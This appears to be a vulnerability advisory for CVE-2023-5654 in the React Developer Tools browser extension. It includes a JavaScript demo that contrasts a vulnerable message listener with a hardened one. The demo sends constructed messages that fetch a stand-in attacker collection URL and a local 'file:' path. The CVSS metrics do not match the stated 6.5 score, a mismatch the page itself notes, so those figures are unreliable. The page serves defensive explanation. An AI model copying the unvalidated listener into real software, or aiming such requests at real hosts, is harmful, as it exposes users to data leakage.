Message Handling Vulnerability in React Developer Tools Extension by Meta
CVE-2023-5654

6.5 MEDIUM

Key Information:

Vendor: Meta
CVE Published: 19 October 2023

What is CVE-2023-5654?

The React Developer Tools browser extension registers a message listener that accepts messages from the webpage context. Because the listener handles requests from any page without validating or sanitizing the URL they carry, a malicious webpage can make the extension issue requests to arbitrary, attacker-chosen URLs, potentially leading to unauthorized access or data leakage. Exposure requires only that a user with the vulnerable extension installed loads an attacker-controlled page.
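The bug class described above, as an added example that is not React Developer Tools' own code and does not reproduce the extension's real message protocol: a content-script style `message` handler that forwards whatever URL the page supplies to `fetch()`, placed beside a hardened handler that checks the sender window, the sender origin, the message shape and the target URL before fetching. The message type, function names, window stand-ins and origins are assumptions chosen for illustration, and the messages are constructed inline so the example runs offline in Node.

```javascript
// Added example (not React Developer Tools' own code): minimal model of an
// extension message listener that trusts page-supplied URLs, beside a hardened
// version. FETCH_REQUEST, the handler names, PAGE_ORIGIN and the window
// stand-ins are assumptions for illustration; nothing here is the real protocol.

const FETCH_REQUEST = "devtools-fetch-file"; // hypothetical message type

// Recording stand-in for fetch() so the example runs offline.
function makeFetchRecorder() {
  const calls = [];
  return { calls, fetchFn: (url) => { calls.push(url); return Promise.resolve(); } };
}

// Vulnerable handler: any page (or embedded frame) that can postMessage() to
// this window drives the extension's fetch. No sender check, no URL check.
function handleMessageVulnerable(event, fetchFn) {
  const data = event.data;
  if (!data || data.type !== FETCH_REQUEST) return { fetched: false, reason: "ignored" };
  fetchFn(data.url);
  return { fetched: true, url: data.url };
}

// Hardened handler for the same message: the sender must be the page's own
// window at the expected origin, the URL must be a string that parses, uses
// http(s), and stays on that same origin. Relative URLs resolve against the page.
function handleMessageHardened(event, fetchFn, pageWindow, pageOrigin) {
  const data = event.data;
  if (!data || typeof data !== "object" || data.type !== FETCH_REQUEST) {
    return { fetched: false, reason: "ignored" };
  }
  if (event.source !== pageWindow || event.origin !== pageOrigin) {
    return { fetched: false, reason: "untrusted sender" };
  }
  if (typeof data.url !== "string") {
    return { fetched: false, reason: "url not a string" };
  }
  let parsed;
  try {
    parsed = new URL(data.url, pageOrigin);
  } catch {
    return { fetched: false, reason: "malformed url" };
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    return { fetched: false, reason: "disallowed scheme" };
  }
  if (parsed.origin !== pageOrigin) {
    return { fetched: false, reason: "cross-origin target" };
  }
  fetchFn(parsed.href);
  return { fetched: true, url: parsed.href };
}

// Constructed scenario: the page at PAGE_ORIGIN is the legitimate sender; a
// third-party iframe in the same tab can also post to the listener.
const PAGE_ORIGIN = "https://app.example";
const pageWindow = { name: "page" };      // stands in for window
const iframeWindow = { name: "iframe" };  // stands in for an embedded frame

function makeEvent(source, origin, data) {
  return { source, origin, data };
}

// Feeds three constructed messages to both handlers and returns what each fetched.
function demo() {
  const evil = makeEvent(iframeWindow, "https://attacker.example",
    { type: FETCH_REQUEST, url: "https://attacker.example/collect?from=devtools" });
  const fileUrl = makeEvent(pageWindow, PAGE_ORIGIN,
    { type: FETCH_REQUEST, url: "file:///etc/hosts" });
  const ok = makeEvent(pageWindow, PAGE_ORIGIN,
    { type: FETCH_REQUEST, url: "/static/app.js.map" });

  const v = makeFetchRecorder();
  const h = makeFetchRecorder();
  for (const ev of [evil, fileUrl, ok]) {
    handleMessageVulnerable(ev, v.fetchFn);
    handleMessageHardened(ev, h.fetchFn, pageWindow, PAGE_ORIGIN);
  }
  return { vulnerable: v.calls, hardened: h.calls };
}

console.log(demo());
```

The vulnerable handler fetches all three URLs, including the attacker's collection endpoint and a `file:` URL, while the hardened handler fetches only the same-origin source map. In a real extension the `event.source === window` check matters as much as the origin check, because a cross-origin iframe shares the tab's content-script listener but not its `window`.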

Affected Version(s)

React Developer Tools extension < 4.28.4 (upgrade to 4.28.4 or later)

CVSS v3.1

Score: 6.5
Severity: MEDIUM
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Note: the per-metric values listed here do not reproduce the 6.5 score. AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N evaluates to 5.3 under CVSS v3.1, so either the score or one of the metrics above is mis-transcribed; confirm the vector against the NVD or Snyk entry before using it for prioritisation.

Timeline

  • Vulnerability reserved

  • Vulnerability published: 19 October 2023

Credit

Calum Hutton, Snyk